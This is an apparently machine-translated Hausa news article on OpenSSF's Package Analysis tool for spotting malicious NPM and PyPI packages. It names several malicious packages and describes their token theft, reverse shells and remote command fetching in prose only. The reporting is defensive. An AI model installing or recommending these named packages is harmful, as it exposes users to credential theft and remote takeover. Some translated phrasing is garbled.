OpenSSF (Open Source Security Foundation), wanda Linux Foundation ya kirkira kuma da nufin inganta tsaro na buɗaɗɗen software, ya gabatar da Binciken Kunshin Buɗaɗɗen aikin, wanda ke haɓaka tsari don nazarin kasancewar lambar ɓarna a cikin fakiti. An rubuta lambar aikin a cikin Go kuma an rarraba ta ƙarƙashin lasisin Apache 2.0. Binciken farko na ma'ajiyar NPM da PyPI ta amfani da kayan aikin da aka tsara ya ba mu damar gano fakiti sama da 200 da ba a gano a baya ba.
Yawancin fakitin matsalolin da aka gano suna sarrafa mahadar sunaye tare da abubuwan dogaro na cikin gida na ayyukan da ba na jama'a ba (harin rikicewar dogaro) ko amfani da hanyoyin typosquatting (bayyana sunaye masu kama da sunayen shahararrun ɗakunan karatu), da kuma kiran rubutun da ke samun damar runduna ta waje a lokacin. tsarin shigarwa. A cewar masu haɓaka Fakitin Analysis, galibin fakitin da aka gano matsala sun kasance masu yuwuwar masu binciken tsaro da ke shiga cikin shirye-shiryen lada na bug, tunda bayanan da aka aiko sun iyakance ga mai amfani da sunan tsarin, kuma ana aiwatar da ayyukan a bayyane, ba tare da ƙoƙarin yin hakan ba. boye halayensu .
Fakitin da ke da mugun aiki sun haɗa da:
- Kunshin PyPI discordcmd, wanda ke yin rikodin aika buƙatu na yau da kullun zuwa raw.githubusercontent.com, Discord API da ipinfo.io. Kunshin da aka ƙayyade ya sauke lambar bayan gida daga GitHub kuma ya shigar da shi a cikin littafin abokin ciniki na Discord Windows, bayan haka ya fara aikin neman alamun Discord a cikin tsarin fayil da aika su zuwa uwar garken Discord na waje wanda maharan ke sarrafawa.
- Kunshin NPM Colorss shima yayi ƙoƙarin aika alamu daga asusun Discord zuwa sabar waje.
- NPM kunshin @roku-web-core/ajax - yayin aiwatar da shigarwa ya aika bayanai game da tsarin kuma ya ƙaddamar da mai sarrafa (harsashi mai juyawa) wanda ya karɓi haɗin waje da ƙaddamar da umarni.
- PyPI kunshin sirri - ƙaddamar da harsashi mai juyi lokacin shigo da takamaiman tsari.
- NPM kunshin bazuwar-vouchercode-generator - bayan shigo da ɗakin karatu, ta aika da buƙatu zuwa uwar garken waje, wanda ya mayar da umarni da lokacin da ya kamata a gudanar da shi.
Aikin Binciken Kunshin ya zo ƙasa don nazarin fakitin lamba a cikin lambar tushe don kafa haɗin yanar gizo, samun dama ga fayiloli, da umarni masu gudana. Bugu da ƙari, ana sa ido kan canje-canje a yanayin fakitin don tantance ƙarin abubuwan da aka saka qeta a cikin ɗaya daga cikin fitar da software na farko mara lahani. Don saka idanu da bayyanar sabbin fakiti a cikin ma'ajiyar ajiya da yin canje-canje ga fakitin da aka buga a baya, ana amfani da kayan aikin Kayan Kayan Kayan Kayan Kayan Abinci, wanda ke haɗa aiki tare da NPM, PyPI, Go, RubyGems, Packagist, NuGet da Crate repositories.
Binciken fakitin ya ƙunshi abubuwa na asali guda uku waɗanda za a iya amfani da su a haɗin gwiwa da kuma daban:
- Mai tsara jadawalin ƙaddamar da aikin tantance fakiti bisa bayanai daga Fakitin Ciyarwar.
- Mai nazari wanda ke yin nazarin fakiti kai tsaye tare da kimanta halayensa ta amfani da tsayayyen bincike da dabarun ganowa. Ana yin gwajin ne a cikin keɓe muhalli.
- Loader wanda ke sanya sakamakon gwajin cikin ma'ajiyar BigQuery.
source: budenet.ru